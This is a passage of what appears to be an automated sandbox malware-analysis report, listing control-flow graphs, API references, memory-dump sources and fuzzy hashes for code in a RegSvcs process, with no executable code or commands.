62679f5-6267a36 3076 6267a36 call 6976823 2931->3076 3077 6267a36 call 6976880 2931->3077 2934 6267a3c-6267a7d 3088 6267a7d call 6977183 2934->3088 3089 6267a7d call 6976d18 2934->3089 3090 6267a7d call 6976bc8 2934->3090 2937 6267a83-6267ac4 3091 6267ac4 call 6978671 2937->3091 3092 6267ac4 call 6978680 2937->3092 2940 6267aca-6267b52 3021 6267b52 call 6978e21 2940->3021 3022 6267b52 call 6978e80 2940->3022 3023 6267b52 call 6978edf 2940->3023 2946 6267b58-6267b9c 3033 6267b9c call 6978fa0 2946->3033 3034 6267b9c call 6978f40 2946->3034 3035 6267b9c call 697928c 2946->3035 3036 6267b9c call 6979238 2946->3036 2949 6267ba2-6267bda 3037 6267bda call 697f917 2949->3037 3038 6267bda call 697f310 2949->3038 3039 6267bda call 697f320 2949->3039 2952 6267be0-6267c24 3048 6267c24 call 697fa37 2952->3048 3049 6267c24 call 697f9d4 2952->3049 3050 6267c24 call 697f989 2952->3050 3051 6267c24 call 697f9d8 2952->3051 2955 6267c2a-6267d4c 3058 6267d4c call 6900ab0 2955->3058 3059 6267d4c call 6900b60 2955->3059 3060 6267d4c call 6900e92 2955->3060 3061 6267d4c call 6900f28 2955->3061 3062 6267d4c call 6900eba 2955->3062 2967 6267d52-6267d8a 3069 6267d8a call 6901060 2967->3069 3070 6267d8a call 6900fff 2967->3070 3071 6267d8a call 69010bf 2967->3071 2970 6267d90-6267e12 3086 6267e12 call 6901180 2970->3086 3087 6267e12 call 6901120 2970->3087 2976 6267e18-6267e9a 3019 6267e9a call 6901ec8 2976->3019 3020 6267e9a call 6901dc8 2976->3020 2982 6267ea0-6267f2e call 69022e8 3030 6267f2e call 6902f00 2982->3030 3031 6267f2e call 69030e0 2982->3031 3032 6267f2e call 690313f 2982->3032 2988 6267f34-6267f78 3043 6267f78 call 6903200 2988->3043 3044 6267f78 call 69031a0 2988->3044 2991 6267f7e-626800c call 690479a 3052 626800c call 69049b0 2991->3052 3053 626800c call 69047c2 2991->3053 2997 6268012-62680ea 3056 62680ea call 6905798 2997->3056 3057 62680ea call 69057f8 2997->3057 3006 62680f0-626817e 3078 626817e call 6905bf0 3006->3078 3079 626817e call 6905b92 3006->3079 3012 6268184-62681d5 3015->2902 3016->2902 3017->2902 3018->2902 3019->2982 3020->2982 3021->2946 3022->2946 3023->2946 3024->2907 3025->2907 3026->2907 3028->2910 3029->2910 3030->2988 3031->2988 3032->2988 3033->2949 3034->2949 3035->2949 3036->2949 3037->2952 3038->2952 3039->2952 3040->2913 3041->2913 3042->2913 3043->2991 3044->2991 3045->2916 3046->2916 3048->2955 3049->2955 3050->2955 3051->2955 3052->2997 3053->2997 3054->2925 3055->2925 3056->3006 3057->3006 3058->2967 3059->2967 3060->2967 3061->2967 3062->2967 3063->2893 3064->2893 3065->2893 3066->2893 3067->2893 3068->2893 3069->2970 3070->2970 3071->2970 3072->2931 3073->2931 3074->2931 3075->2931 3076->2934 3077->2934 3078->3012 3079->3012 3080->2899 3081->2899 3082->2899 3083->2899 3084->2899 3085->2899 3086->2976 3087->2976 3088->2937 3089->2937 3090->2937 3091->2940 3092->2940
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: a765ff5e79fb51c30688dbcc6ac62e292acd1e5fac62dd1c6882a00d9c2d45b5
                                                                                                    • Instruction ID: 2265149d3a94ad147c946d854d876ecde25c44df98ac8d413a81434cf43fc3ee
                                                                                                    • Opcode Fuzzy Hash: a765ff5e79fb51c30688dbcc6ac62e292acd1e5fac62dd1c6882a00d9c2d45b5
                                                                                                    • Instruction Fuzzy Hash: 73F1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 3093 6267671-62676d5 3236 62676d5 call 6971d27 3093->3236 3237 62676d5 call 6971e27 3093->3237 3238 62676d5 call 6971bd0 3093->3238 3239 62676d5 call 6971bc0 3093->3239 3240 62676d5 call 6971d69 3093->3240 3241 62676d5 call 6971dc8 3093->3241 3100 62676db-626771c 3249 626771c call 6971f47 3100->3249 3250 626771c call 6971e88 3100->3250 3251 626771c call 6971ee8 3100->3251 3252 626771c call 6971fa8 3100->3252 3103 6267722-62677aa KiUserExceptionDispatcher 3258 62677aa call 69722f7 3103->3258 3259 62677aa call 69723b7 3103->3259 3260 62677aa call 6972358 3103->3260 3108 62677b0-62677f1 3262 62677f1 call 6972418 3108->3262 3263 62677f1 call 6972478 3108->3263 3111 62677f7-6267838 3274 6267838 call 6972cc0 3111->3274 3275 6267838 call 6972b70 3111->3275 3276 6267838 call 6972d1f 3111->3276 3114 626783e-626787f 3279 626787f call 6972d80 3114->3279 3280 626787f call 6972de0 3114->3280 3117 6267885-626794b 3216 626794b call 6974c68 3117->3216 3217 626794b call 6974b18 3117->3217 3126 6267951-62679ef KiUserExceptionDispatcher 3228 62679ef call 6976823 3126->3228 3229 62679ef call 6976760 3126->3229 3230 62679ef call 69766af 3126->3230 3231 62679ef call 69767bf 3126->3231 3132 62679f5-6267a36 3232 6267a36 call 6976823 3132->3232 3233 6267a36 call 6976880 3132->3233 3135 6267a3c-6267a7d 3244 6267a7d call 6977183 3135->3244 3245 6267a7d call 6976d18 3135->3245 3246 6267a7d call 6976bc8 3135->3246 3138 6267a83-6267ac4 3247 6267ac4 call 6978671 3138->3247 3248 6267ac4 call 6978680 3138->3248 3141 6267aca-6267b52 3255 6267b52 call 6978e21 3141->3255 3256 6267b52 call 6978e80 3141->3256 3257 6267b52 call 6978edf 3141->3257 3147 6267b58-6267b9c 3267 6267b9c call 6978fa0 3147->3267 3268 6267b9c call 6978f40 3147->3268 3269 6267b9c call 697928c 3147->3269 3270 6267b9c call 6979238 3147->3270 3150 6267ba2-6267bda 3271 6267bda call 697f917 3150->3271 3272 6267bda call 697f310 3150->3272 3273 6267bda call 697f320 3150->3273 3153 6267be0-6267c24 3282 6267c24 call 697fa37 3153->3282 3283 6267c24 call 697f9d4 3153->3283 3284 6267c24 call 697f989 3153->3284 3285 6267c24 call 697f9d8 3153->3285 3156 6267c2a-6267d4c 3220 6267d4c call 6900ab0 3156->3220 3221 6267d4c call 6900b60 3156->3221 3222 6267d4c call 6900e92 3156->3222 3223 6267d4c call 6900f28 3156->3223 3224 6267d4c call 6900eba 3156->3224 3168 6267d52-6267d8a 3225 6267d8a call 6901060 3168->3225 3226 6267d8a call 6900fff 3168->3226 3227 6267d8a call 69010bf 3168->3227 3171 6267d90-6267e12 3242 6267e12 call 6901180 3171->3242 3243 6267e12 call 6901120 3171->3243 3177 6267e18-6267e9a 3253 6267e9a call 6901ec8 3177->3253 3254 6267e9a call 6901dc8 3177->3254 3183 6267ea0-6267f2e call 69022e8 3264 6267f2e call 6902f00 3183->3264 3265 6267f2e call 69030e0 3183->3265 3266 6267f2e call 690313f 3183->3266 3189 6267f34-6267f78 3277 6267f78 call 6903200 3189->3277 3278 6267f78 call 69031a0 3189->3278 3192 6267f7e-626800c call 690479a 3286 626800c call 69049b0 3192->3286 3287 626800c call 69047c2 3192->3287 3198 6268012-62680ea 3218 62680ea call 6905798 3198->3218 3219 62680ea call 69057f8 3198->3219 3207 62680f0-626817e 3234 626817e call 6905bf0 3207->3234 3235 626817e call 6905b92 3207->3235 3213 6268184-62681d5 3216->3126 3217->3126 3218->3207 3219->3207 3220->3168 3221->3168 3222->3168 3223->3168 3224->3168 3225->3171 3226->3171 3227->3171 3228->3132 3229->3132 3230->3132 3231->3132 3232->3135 3233->3135 3234->3213 3235->3213 3236->3100 3237->3100 3238->3100 3239->3100 3240->3100 3241->3100 3242->3177 3243->3177 3244->3138 3245->3138 3246->3138 3247->3141 3248->3141 3249->3103 3250->3103 3251->3103 3252->3103 3253->3183 3254->3183 3255->3147 3256->3147 3257->3147 3258->3108 3259->3108 3260->3108 3262->3111 3263->3111 3264->3189 3265->3189 3266->3189 3267->3150 3268->3150 3269->3150 3270->3150 3271->3153 3272->3153 3273->3153 3274->3114 3275->3114 3276->3114 3277->3192 3278->3192 3279->3117 3280->3117 3282->3156 3283->3156 3284->3156 3285->3156 3286->3198 3287->3198
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 2e98e32d961192fb0c91d520ad91d7f19d8fd5e64007f538cd1fa933e6f6e3b1
                                                                                                    • Instruction ID: 8c57e28aac30e56c3c582509b7ca4f68b617a3b3547c236e8f4666e128fa5d01
                                                                                                    • Opcode Fuzzy Hash: 2e98e32d961192fb0c91d520ad91d7f19d8fd5e64007f538cd1fa933e6f6e3b1
                                                                                                    • Instruction Fuzzy Hash: E1F1B534911368CFDBA5DF30E88C699B7B6BF4931AF1041E9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 3288 62676af-62676d5 3428 62676d5 call 6971d27 3288->3428 3429 62676d5 call 6971e27 3288->3429 3430 62676d5 call 6971bd0 3288->3430 3431 62676d5 call 6971bc0 3288->3431 3432 62676d5 call 6971d69 3288->3432 3433 62676d5 call 6971dc8 3288->3433 3292 62676db-626771c 3441 626771c call 6971f47 3292->3441 3442 626771c call 6971e88 3292->3442 3443 626771c call 6971ee8 3292->3443 3444 626771c call 6971fa8 3292->3444 3295 6267722-62677aa KiUserExceptionDispatcher 3450 62677aa call 69722f7 3295->3450 3451 62677aa call 69723b7 3295->3451 3452 62677aa call 6972358 3295->3452 3300 62677b0-62677f1 3454 62677f1 call 6972418 3300->3454 3455 62677f1 call 6972478 3300->3455 3303 62677f7-6267838 3466 6267838 call 6972cc0 3303->3466 3467 6267838 call 6972b70 3303->3467 3468 6267838 call 6972d1f 3303->3468 3306 626783e-626787f 3471 626787f call 6972d80 3306->3471 3472 626787f call 6972de0 3306->3472 3309 6267885-626794b 3408 626794b call 6974c68 3309->3408 3409 626794b call 6974b18 3309->3409 3318 6267951-62679ef KiUserExceptionDispatcher 3420 62679ef call 6976823 3318->3420 3421 62679ef call 6976760 3318->3421 3422 62679ef call 69766af 3318->3422 3423 62679ef call 69767bf 3318->3423 3324 62679f5-6267a36 3424 6267a36 call 6976823 3324->3424 3425 6267a36 call 6976880 3324->3425 3327 6267a3c-6267a7d 3436 6267a7d call 6977183 3327->3436 3437 6267a7d call 6976d18 3327->3437 3438 6267a7d call 6976bc8 3327->3438 3330 6267a83-6267ac4 3439 6267ac4 call 6978671 3330->3439 3440 6267ac4 call 6978680 3330->3440 3333 6267aca-6267b52 3447 6267b52 call 6978e21 3333->3447 3448 6267b52 call 6978e80 3333->3448 3449 6267b52 call 6978edf 3333->3449 3339 6267b58-6267b9c 3459 6267b9c call 6978fa0 3339->3459 3460 6267b9c call 6978f40 3339->3460 3461 6267b9c call 697928c 3339->3461 3462 6267b9c call 6979238 3339->3462 3342 6267ba2-6267bda 3463 6267bda call 697f917 3342->3463 3464 6267bda call 697f310 3342->3464 3465 6267bda call 697f320 3342->3465 3345 6267be0-6267c24 3474 6267c24 call 697fa37 3345->3474 3475 6267c24 call 697f9d4 3345->3475 3476 6267c24 call 697f989 3345->3476 3477 6267c24 call 697f9d8 3345->3477 3348 6267c2a-6267d4c 3412 6267d4c call 6900ab0 3348->3412 3413 6267d4c call 6900b60 3348->3413 3414 6267d4c call 6900e92 3348->3414 3415 6267d4c call 6900f28 3348->3415 3416 6267d4c call 6900eba 3348->3416 3360 6267d52-6267d8a 3417 6267d8a call 6901060 3360->3417 3418 6267d8a call 6900fff 3360->3418 3419 6267d8a call 69010bf 3360->3419 3363 6267d90-6267e12 3434 6267e12 call 6901180 3363->3434 3435 6267e12 call 6901120 3363->3435 3369 6267e18-6267e9a 3445 6267e9a call 6901ec8 3369->3445 3446 6267e9a call 6901dc8 3369->3446 3375 6267ea0-6267f2e call 69022e8 3456 6267f2e call 6902f00 3375->3456 3457 6267f2e call 69030e0 3375->3457 3458 6267f2e call 690313f 3375->3458 3381 6267f34-6267f78 3469 6267f78 call 6903200 3381->3469 3470 6267f78 call 69031a0 3381->3470 3384 6267f7e-626800c call 690479a 3478 626800c call 69049b0 3384->3478 3479 626800c call 69047c2 3384->3479 3390 6268012-62680ea 3410 62680ea call 6905798 3390->3410 3411 62680ea call 69057f8 3390->3411 3399 62680f0-626817e 3426 626817e call 6905bf0 3399->3426 3427 626817e call 6905b92 3399->3427 3405 6268184-62681d5 3408->3318 3409->3318 3410->3399 3411->3399 3412->3360 3413->3360 3414->3360 3415->3360 3416->3360 3417->3363 3418->3363 3419->3363 3420->3324 3421->3324 3422->3324 3423->3324 3424->3327 3425->3327 3426->3405 3427->3405 3428->3292 3429->3292 3430->3292 3431->3292 3432->3292 3433->3292 3434->3369 3435->3369 3436->3330 3437->3330 3438->3330 3439->3333 3440->3333 3441->3295 3442->3295 3443->3295 3444->3295 3445->3375 3446->3375 3447->3339 3448->3339 3449->3339 3450->3300 3451->3300 3452->3300 3454->3303 3455->3303 3456->3381 3457->3381 3458->3381 3459->3342 3460->3342 3461->3342 3462->3342 3463->3345 3464->3345 3465->3345 3466->3306 3467->3306 3468->3306 3469->3384 3470->3384 3471->3309 3472->3309 3474->3348 3475->3348 3476->3348 3477->3348 3478->3390 3479->3390
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: ec9c17f3cb53d3a9d0200a94cfc753671dbe71d809b8986f60414926ec0fc82a
                                                                                                    • Instruction ID: c59e609a9003a939e219c775f623b47c29f248a9ed444df10971c1e306caf3f2
                                                                                                    • Opcode Fuzzy Hash: ec9c17f3cb53d3a9d0200a94cfc753671dbe71d809b8986f60414926ec0fc82a
                                                                                                    • Instruction Fuzzy Hash: 94E1B634911368CFDB65DF30E88C699B7B6BF4931AF1041D9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 3480 62676f6-626771c 3622 626771c call 6971f47 3480->3622 3623 626771c call 6971e88 3480->3623 3624 626771c call 6971ee8 3480->3624 3625 626771c call 6971fa8 3480->3625 3484 6267722-62677aa KiUserExceptionDispatcher 3630 62677aa call 69722f7 3484->3630 3631 62677aa call 69723b7 3484->3631 3632 62677aa call 6972358 3484->3632 3489 62677b0-62677f1 3641 62677f1 call 6972418 3489->3641 3642 62677f1 call 6972478 3489->3642 3492 62677f7-6267838 3646 6267838 call 6972cc0 3492->3646 3647 6267838 call 6972b70 3492->3647 3648 6267838 call 6972d1f 3492->3648 3495 626783e-626787f 3658 626787f call 6972d80 3495->3658 3659 626787f call 6972de0 3495->3659 3498 6267885-626794b 3597 626794b call 6974c68 3498->3597 3598 626794b call 6974b18 3498->3598 3507 6267951-62679ef KiUserExceptionDispatcher 3606 62679ef call 6976823 3507->3606 3607 62679ef call 6976760 3507->3607 3608 62679ef call 69766af 3507->3608 3609 62679ef call 69767bf 3507->3609 3513 62679f5-6267a36 3613 6267a36 call 6976823 3513->3613 3614 6267a36 call 6976880 3513->3614 3516 6267a3c-6267a7d 3617 6267a7d call 6977183 3516->3617 3618 6267a7d call 6976d18 3516->3618 3619 6267a7d call 6976bc8 3516->3619 3519 6267a83-6267ac4 3626 6267ac4 call 6978671 3519->3626 3627 6267ac4 call 6978680 3519->3627 3522 6267aca-6267b52 3634 6267b52 call 6978e21 3522->3634 3635 6267b52 call 6978e80 3522->3635 3636 6267b52 call 6978edf 3522->3636 3528 6267b58-6267b9c 3637 6267b9c call 6978fa0 3528->3637 3638 6267b9c call 6978f40 3528->3638 3639 6267b9c call 697928c 3528->3639 3640 6267b9c call 6979238 3528->3640 3531 6267ba2-6267bda 3651 6267bda call 697f917 3531->3651 3652 6267bda call 697f310 3531->3652 3653 6267bda call 697f320 3531->3653 3534 6267be0-6267c24 3654 6267c24 call 697fa37 3534->3654 3655 6267c24 call 697f9d4 3534->3655 3656 6267c24 call 697f989 3534->3656 3657 6267c24 call 697f9d8 3534->3657 3537 6267c2a-6267d4c 3599 6267d4c call 6900ab0 3537->3599 3600 6267d4c call 6900b60 3537->3600 3601 6267d4c call 6900e92 3537->3601 3602 6267d4c call 6900f28 3537->3602 3603 6267d4c call 6900eba 3537->3603 3549 6267d52-6267d8a 3610 6267d8a call 6901060 3549->3610 3611 6267d8a call 6900fff 3549->3611 3612 6267d8a call 69010bf 3549->3612 3552 6267d90-6267e12 3620 6267e12 call 6901180 3552->3620 3621 6267e12 call 6901120 3552->3621 3558 6267e18-6267e9a 3628 6267e9a call 6901ec8 3558->3628 3629 6267e9a call 6901dc8 3558->3629 3564 6267ea0-6267f2e call 69022e8 3643 6267f2e call 6902f00 3564->3643 3644 6267f2e call 69030e0 3564->3644 3645 6267f2e call 690313f 3564->3645 3570 6267f34-6267f78 3649 6267f78 call 6903200 3570->3649 3650 6267f78 call 69031a0 3570->3650 3573 6267f7e-626800c call 690479a 3661 626800c call 69049b0 3573->3661 3662 626800c call 69047c2 3573->3662 3579 6268012-62680ea 3604 62680ea call 6905798 3579->3604 3605 62680ea call 69057f8 3579->3605 3588 62680f0-626817e 3615 626817e call 6905bf0 3588->3615 3616 626817e call 6905b92 3588->3616 3594 6268184-62681d5 3597->3507 3598->3507 3599->3549 3600->3549 3601->3549 3602->3549 3603->3549 3604->3588 3605->3588 3606->3513 3607->3513 3608->3513 3609->3513 3610->3552 3611->3552 3612->3552 3613->3516 3614->3516 3615->3594 3616->3594 3617->3519 3618->3519 3619->3519 3620->3558 3621->3558 3622->3484 3623->3484 3624->3484 3625->3484 3626->3522 3627->3522 3628->3564 3629->3564 3630->3489 3631->3489 3632->3489 3634->3528 3635->3528 3636->3528 3637->3531 3638->3531 3639->3531 3640->3531 3641->3492 3642->3492 3643->3570 3644->3570 3645->3570 3646->3495 3647->3495 3648->3495 3649->3573 3650->3573 3651->3534 3652->3534 3653->3534 3654->3537 3655->3537 3656->3537 3657->3537 3658->3498 3659->3498 3661->3579 3662->3579
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: f1bb062bb6918c78fa4be7967446b95d70a81fdb718836ed2133fcc55d4dfa8c
                                                                                                    • Instruction ID: 6e3525f1618916acaebf3bc7e2bfcaa812016831ca840f9804ed8f919fab58d7
                                                                                                    • Opcode Fuzzy Hash: f1bb062bb6918c78fa4be7967446b95d70a81fdb718836ed2133fcc55d4dfa8c
                                                                                                    • Instruction Fuzzy Hash: 50E1B534911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 17ee906eef018d8f3ffda94c65032eb39149615732acc20edae0ea741d2d4d83
                                                                                                    • Instruction ID: 238e897d9b57e527ce4c19b34311db6ab6d681cde2a3b5fa8272c95af426a608
                                                                                                    • Opcode Fuzzy Hash: 17ee906eef018d8f3ffda94c65032eb39149615732acc20edae0ea741d2d4d83
                                                                                                    • Instruction Fuzzy Hash: 06E1C634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 55f1720445fbd15d720c8a163ab60f4ca444daaaf20983d454cdfb39aff8227b
                                                                                                    • Instruction ID: 817c1faa807ed1abe75a2ba33ca5b18144f6bc38615224abc911707ec30a0e1e
                                                                                                    • Opcode Fuzzy Hash: 55f1720445fbd15d720c8a163ab60f4ca444daaaf20983d454cdfb39aff8227b
                                                                                                    • Instruction Fuzzy Hash: C7E1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 8540595229da2f2752de46d3df8f71d2f7feb0607935f56630960b25f043501d
                                                                                                    • Instruction ID: ff4d6db29fe358b1cdf9034867b7274c40110359b9b9052ef4ce8f17bd5a1061
                                                                                                    • Opcode Fuzzy Hash: 8540595229da2f2752de46d3df8f71d2f7feb0607935f56630960b25f043501d
                                                                                                    • Instruction Fuzzy Hash: 93D1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 6f2be1a47d1cae20a54ead4e03d3260307fd5124e516c6e215f19046b1405739
                                                                                                    • Instruction ID: 18765686188ece1e85d2d279d539588f47db1994adcd16a70fa1d40e944d8d5b
                                                                                                    • Opcode Fuzzy Hash: 6f2be1a47d1cae20a54ead4e03d3260307fd5124e516c6e215f19046b1405739
                                                                                                    • Instruction Fuzzy Hash: 30D1B534911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 3b951b8ec71b26c4205f37537c571ff4bd14162e3701287433c2bc922793be03
                                                                                                    • Instruction ID: f7334994c07d98f46e4324efc13f095087792f1839faa98029b46390646700e2
                                                                                                    • Opcode Fuzzy Hash: 3b951b8ec71b26c4205f37537c571ff4bd14162e3701287433c2bc922793be03
                                                                                                    • Instruction Fuzzy Hash: 5ED1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: aa68332833cc15de270269a8084e74c9b21b411b70af10268df445e0a78a1a5f
                                                                                                    • Instruction ID: 6a9b9ac888191f8ce75763ac3b6ac706d82d9f546a0cba0c329fef05afadedf8
                                                                                                    • Opcode Fuzzy Hash: aa68332833cc15de270269a8084e74c9b21b411b70af10268df445e0a78a1a5f
                                                                                                    • Instruction Fuzzy Hash: 86C1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041E9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: c11bd84c830f5f01b683ae0a9af8604e6b0e4d86fe72225f79fc1ba1646b2b4d
                                                                                                    • Instruction ID: b68cde878251019dbeae4c1f0a4e19fab02e4a2cdfa4a85428cbccc7aedef0a1
                                                                                                    • Opcode Fuzzy Hash: c11bd84c830f5f01b683ae0a9af8604e6b0e4d86fe72225f79fc1ba1646b2b4d
                                                                                                    • Instruction Fuzzy Hash: 0CC1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: d544885a68aac3e3edcf0ab368a456255d3fe4a1063038d861e4d3f6bb60183c
                                                                                                    • Instruction ID: df852c4c631e2dd17c7f7663545f2bf94bbad1371785c592a63a4e6dfbed3cf1
                                                                                                    • Opcode Fuzzy Hash: d544885a68aac3e3edcf0ab368a456255d3fe4a1063038d861e4d3f6bb60183c
                                                                                                    • Instruction Fuzzy Hash: 79C1B634911368CFDBA5DF30E88C699B7B6BF49316F1041D9D90A66340DB395E81CFA1
